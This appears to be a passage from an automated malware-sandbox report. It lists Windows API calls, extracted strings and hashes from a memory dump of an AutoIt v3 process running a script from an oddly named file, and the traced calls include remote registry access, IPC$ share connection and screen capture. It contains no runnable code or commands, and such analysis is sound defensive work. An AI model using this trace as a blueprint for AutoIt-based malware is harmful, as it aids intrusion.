                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008899C8
                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 008899DC
                                                                            • GetDC.USER32 ref: 008899E9
                                                                            • SelectObject.GDI32(00000000,?), ref: 008899F9
                                                                            • SelectObject.GDI32(00000000,00000007), ref: 00889A24
                                                                            • ReleaseDC.USER32 ref: 00889A2F
                                                                            • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00889A4C
                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00889A5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 4040870279-2373415609
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DestroyWindow.USER32(?), ref: 008890DF
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0088919C
                                                                            • SetRect.USER32 ref: 008891DC
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008891ED
                                                                            • CreateWindowExW.USER32 ref: 0088922F
                                                                            • GetClientRect.USER32 ref: 0088923B
                                                                            • CreateWindowExW.USER32 ref: 0088927D
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0088928F
                                                                            • GetStockObject.GDI32(00000011), ref: 00889299
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008892A1
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008892B1
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008892BA
                                                                            • DeleteDC.GDI32(00000000), ref: 008892C3
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00889309
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00889321
                                                                            • CreateWindowExW.USER32 ref: 0088935B
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0088936F
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00889380
                                                                            • CreateWindowExW.USER32 ref: 008893B5
                                                                            • GetStockObject.GDI32(00000011), ref: 008893C0
                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 008893D0
                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008893DB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00886625
                                                                            • GetDesktopWindow.USER32 ref: 0088663A
                                                                            • GetWindowRect.USER32 ref: 00886641
                                                                            • GetWindowLongW.USER32 ref: 00886699
                                                                            • GetWindowLongW.USER32 ref: 008866AC
                                                                            • DestroyWindow.USER32(?), ref: 008866BD
                                                                            • CreateWindowExW.USER32 ref: 0088670B
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00886729
                                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 0088673D
                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0088674D
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 0088676D
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00886783
                                                                            • IsWindowVisible.USER32 ref: 008867A3
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008867BF
                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 008867D3
                                                                            • GetWindowRect.USER32 ref: 008867EA
                                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00886808
                                                                            • GetMonitorInfoW.USER32 ref: 00886820
                                                                            • CopyRect.USER32 ref: 00886835
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0088688B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                            • String ID: ($,$tooltips_class32
                                                                            • API String ID: 225202481-3320066284
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 790654849-1810252412
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __wcsicoll$IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2485277191-404129466
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00894765
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00894775
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0089479D
                                                                            • _wcslen.LIBCMT ref: 00894865
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00894879
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008948A1
                                                                            • _wcslen.LIBCMT ref: 008948F7
                                                                            • _wcslen.LIBCMT ref: 0089490D
                                                                            • _wcslen.LIBCMT ref: 0089492C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcslen$Directory$CurrentSystem
                                                                            • String ID: D
                                                                            • API String ID: 1914653954-2746444292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • __wcsicoll.LIBCMT ref: 00832262
                                                                            • __wcsicoll.LIBCMT ref: 00832278
                                                                            • __wcsicoll.LIBCMT ref: 0083228E
                                                                              • Part of subcall function 008413CB: __wcsicmp_l.LIBCMT ref: 0084144B
                                                                            • __wcsicoll.LIBCMT ref: 008322A4
                                                                            • _wcscpy.LIBCMT ref: 008322C4
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\33920049\fmkkelc.omp,00000104), ref: 00858AD6
                                                                            • _wcscpy.LIBCMT ref: 00858B29
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\33920049\fmkkelc.omp$CMDLINE$CMDLINERAW
                                                                            • API String ID: 574121520-2838865966
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessagePost$CtrlFocus
                                                                            • String ID: 0
                                                                            • API String ID: 1534620443-4108050209
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00857F37,?,0000138C,?,00000001,?,?,?), ref: 008905F5
                                                                            • LoadStringW.USER32(00000000,?,00857F37,?), ref: 008905FC
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00857F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0089061C
                                                                            • LoadStringW.USER32(00000000,?,00857F37,?), ref: 00890623
                                                                            • __swprintf.LIBCMT ref: 00890661
                                                                            • __swprintf.LIBCMT ref: 00890679
                                                                            • _wprintf.LIBCMT ref: 0089072D
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00890746
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 3631882475-2268648507
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 008A225C
                                                                            • __swprintf.LIBCMT ref: 008A2273
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,008BBF48), ref: 008A24A6
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,008BBF48), ref: 008A24C0
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,008BBF48), ref: 008A24DA
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,008BBF48), ref: 008A24F4
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,008BBF48), ref: 008A250E
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,008BBF48), ref: 008A2528
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,008BBF48), ref: 008A2542
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,008BBF48), ref: 008A255C
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,008BBF48), ref: 008A2576
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: FolderPath$LocalTime__swprintf
                                                                            • String ID: %.3d
                                                                            • API String ID: 3337348382-986655627
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                            • String ID: %s%u
                                                                            • API String ID: 1899580136-679674701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetDC.USER32 ref: 0086139D
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008613AE
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 008613B8
                                                                            • SelectObject.GDI32(00000000,?), ref: 008613C5
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0086142B
                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00861464
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                            • String ID: (
                                                                            • API String ID: 3300687185-3887548279
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00860030
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0086004B
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00860056
                                                                            • GlobalLock.KERNEL32 ref: 00860063
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00860072
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00860079
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00860080
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0086008D
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,008B29F8,?), ref: 008600AB
                                                                            • GlobalFree.KERNEL32 ref: 008600BD
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 008600E4
                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00860115
                                                                            • DeleteObject.GDI32(?), ref: 0086013D
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00860154
                                                                            Similarity
                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3969911579-0
                                                                            • Opcode ID: 74dddf0a85320eb5390cfa040a9c9b4bbfbdac8b9c68382547cfbebcb760dc33
                                                                            • Instruction ID: f86c311f2dc33e8132fbad8cb403e8ff9f441cfcd571d517bfb4b74bc7170bca
                                                                            • Opcode Fuzzy Hash: 74dddf0a85320eb5390cfa040a9c9b4bbfbdac8b9c68382547cfbebcb760dc33
                                                                            • Instruction Fuzzy Hash: 6A415E75600608AFD710DFA4DC89FAAB7B8FF49711F108255F905EB290D774AD01CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                            • String ID: 0
                                                                            • API String ID: 956284711-4108050209
                                                                            • Opcode ID: fc1b405000ea848567b9db3eaa2d0ef6c0e6512eeba26c21ce9a43935e303bf9
                                                                            • Instruction ID: f9c96731877e69a840ce33c5c9d06285147292aca91a3665fd3ba96ba925cbe8
                                                                            • Opcode Fuzzy Hash: fc1b405000ea848567b9db3eaa2d0ef6c0e6512eeba26c21ce9a43935e303bf9
                                                                            • Instruction Fuzzy Hash: FB415B70304702AFD724EF68D898B6AB7A8FF48301F548A18F955CB291EB74EC41CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 1965227024-3771769585
                                                                            • Opcode ID: 2105124a96208f216c8bce17197ee2d10b4a2dd1d2f98a55913826c45377f2de
                                                                            • Instruction ID: 06c5a5319636ffadd6c4a43dd3416c3500155e2076fdde7f576b74e65ca64088
                                                                            • Opcode Fuzzy Hash: 2105124a96208f216c8bce17197ee2d10b4a2dd1d2f98a55913826c45377f2de
                                                                            • Instruction Fuzzy Hash: 90210A32A00118ABCB10AB68DC09EFA736CFF95311F004399F909D7141EE719A858BB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0088F5C2
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088F5D9
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088F5EB
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0088F5FE
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088F60B
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0088F621
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: SendString$_memmove_wcslen
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 369157077-1007645807
                                                                            • Opcode ID: 133002d91b6a89e2f507b6ca9474431c0e49d426394cb940520eba4c76fc684f
                                                                            • Instruction ID: 0ddaf11d6d6770fdbd8fdb9661c04fec5b3ebd3d4b1db8ad52425da1e9b60b7c
                                                                            • Opcode Fuzzy Hash: 133002d91b6a89e2f507b6ca9474431c0e49d426394cb940520eba4c76fc684f
                                                                            • Instruction Fuzzy Hash: 4321907169031D26E720F798DC42FFE7368FBC0B41F100525F614EA2D2DAB0694487D9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 008791FD
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00879210
                                                                            • CharNextW.USER32(?,?,?,000000FF,?), ref: 00879242
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 0087925A
                                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 0087928B
                                                                            • SendMessageW.USER32(?,?,000000FF,?), ref: 008792A2
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 008792B5
                                                                            • SendMessageW.USER32(?,00000402,?), ref: 008792F2
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00879366
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008793D0
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID:
                                                                            • API String ID: 1350042424-0
                                                                            • Opcode ID: 45b0c78bd1c726f8174ea5f7c123f18386458c9c5afc43c091300cca5af5b469
                                                                            • Instruction ID: 271ffc0308c19e7daeaba2b1567c681f6e7423064630eb510bab7ddcd3d6be56
                                                                            • Opcode Fuzzy Hash: 45b0c78bd1c726f8174ea5f7c123f18386458c9c5afc43c091300cca5af5b469
                                                                            • Instruction Fuzzy Hash: 6981C135A00208ABDB10DF98DC85FFEB778FB55720F10825AFA28DB284D775D9418BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 3038501623-2263619337
                                                                            • Opcode ID: 0efd7f6c5decb93695daee2f8bef770f7c7b7c592c3271355b160bd4beb82ec2
                                                                            • Instruction ID: 5de1d383a92897c40020c681df0c5f250ea7837f66c0980e9dfc8c2f19b46b67
                                                                            • Opcode Fuzzy Hash: 0efd7f6c5decb93695daee2f8bef770f7c7b7c592c3271355b160bd4beb82ec2
                                                                            • Instruction Fuzzy Hash: 90410B729001189BDB10FB78DC46F66B368FF55701F0449B5E909CB246EB35DA58C793
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0088E56D
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0088E58C
                                                                            • __swprintf.LIBCMT ref: 0088E5E3
                                                                            • _wprintf.LIBCMT ref: 0088E690
                                                                            • _wprintf.LIBCMT ref: 0088E6B4
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2295938435-8599901
                                                                            • Opcode ID: 6b1fe4212ee996596bb50b373caed1211638ff5a27cddd72ec3176fef0e86d4f
                                                                            • Instruction ID: 49b39f855109d43306d690471ca532102d220fe2983cb5492a8192eac5396008
                                                                            • Opcode Fuzzy Hash: 6b1fe4212ee996596bb50b373caed1211638ff5a27cddd72ec3176fef0e86d4f
                                                                            • Instruction Fuzzy Hash: 18518571D002099BDB14EBA8DC86EEFB778FF95740F508025F915E7252EA30AE45CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetWindowLongW.USER32 ref: 008A1496
                                                                            • LoadImageW.USER32 ref: 008A14B1
                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 008A14CA
                                                                            • DeleteObject.GDI32(?), ref: 008A14D8
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 008A14E6
                                                                            • LoadImageW.USER32 ref: 008A1529
                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 008A1542
                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 008A1563
                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 008A1587
                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 008A1596
                                                                            • DeleteObject.GDI32(?), ref: 008A15A4
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 008A15B2
                                                                            Similarity
                                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3218148540-0
                                                                            • Opcode ID: d9591d844e1c40221385e4cd57fcded31958da3beaf75a6b47d94d308c94ffa6
                                                                            • Instruction ID: 799bc69e571183446a9cde9936fc278bf92b27de605593caee12fa7a6df953ea
                                                                            • Opcode Fuzzy Hash: d9591d844e1c40221385e4cd57fcded31958da3beaf75a6b47d94d308c94ffa6
                                                                            • Instruction Fuzzy Hash: 94418075744309ABEB209F68DC4DBAB77A8FB85721F104619FA42E76C0CB74E845C7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
                                                                              • Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00888698
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008886B5
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 008886D3
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00888701
                                                                            • CLSIDFromString.OLE32(?,?), ref: 0088872A
                                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 00888736
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0088873C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 600699880-22481851
                                                                            • Opcode ID: 6ba5bc10118a076a8105def03e9064e8bb1e92668a8c619adca5e7f2dc50e4ec
                                                                            • Instruction ID: 5ce7ad68898f64677257a489d8e20be5b59f9fbf9a3022c83b9804afaf20d940
                                                                            • Opcode Fuzzy Hash: 6ba5bc10118a076a8105def03e9064e8bb1e92668a8c619adca5e7f2dc50e4ec
                                                                            • Instruction Fuzzy Hash: D7414376D0020DABCB14EFA8DC45ADE77B9FF84340F508115F915E7251EB74A909CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089B103
                                                                            Similarity
                                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 15295421-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,008A95B7), ref: 008A933A
                                                                            • SafeArrayAllocData.OLEAUT32(008A95B7), ref: 008A9389
                                                                            • VariantInit.OLEAUT32(?), ref: 008A939B
                                                                            • SafeArrayAccessData.OLEAUT32(008A95B7,?), ref: 008A93BC
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 008A941B
                                                                            • SafeArrayUnaccessData.OLEAUT32(008A95B7), ref: 008A942E
                                                                            • VariantClear.OLEAUT32(?), ref: 008A9443
                                                                            • SafeArrayDestroyData.OLEAUT32(008A95B7), ref: 008A9468
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(008A95B7), ref: 008A9472
                                                                            • VariantClear.OLEAUT32(?), ref: 008A9484
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(008A95B7), ref: 008A94A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00863058
                                                                            • __swprintf.LIBCMT ref: 0086306A
                                                                            • __wcsicoll.LIBCMT ref: 00863077
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 0086308A
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 008630A2
                                                                            • LockResource.KERNEL32(00000000), ref: 008630AF
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 008630DC
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 008630EA
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 008630F9
                                                                            • LockResource.KERNEL32(?), ref: 00863105
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                            • String ID:
                                                                            • API String ID: 1158019794-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                            • String ID: AU3_FreeVar
                                                                            • API String ID: 2634073740-771828931
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00886308: GetCursorPos.USER32(?), ref: 0088631D
                                                                              • Part of subcall function 00886308: ScreenToClient.USER32 ref: 0088633A
                                                                              • Part of subcall function 00886308: GetAsyncKeyState.USER32(?), ref: 00886377
                                                                              • Part of subcall function 00886308: GetAsyncKeyState.USER32(?), ref: 00886387
                                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 008A10FF
                                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 008A111D
                                                                            • ImageList_EndDrag.COMCTL32 ref: 008A1123
                                                                            • ReleaseCapture.USER32 ref: 008A1129
                                                                            • SetWindowTextW.USER32(?,00000000), ref: 008A11C0
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008A11D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 2483343779-2107944366
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00878101
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00878104
                                                                            • GetWindowLongW.USER32 ref: 00878128
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0087814B
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008781BF
                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 0087820D
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00878228
                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 0087824A
                                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00878261
                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00878279
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
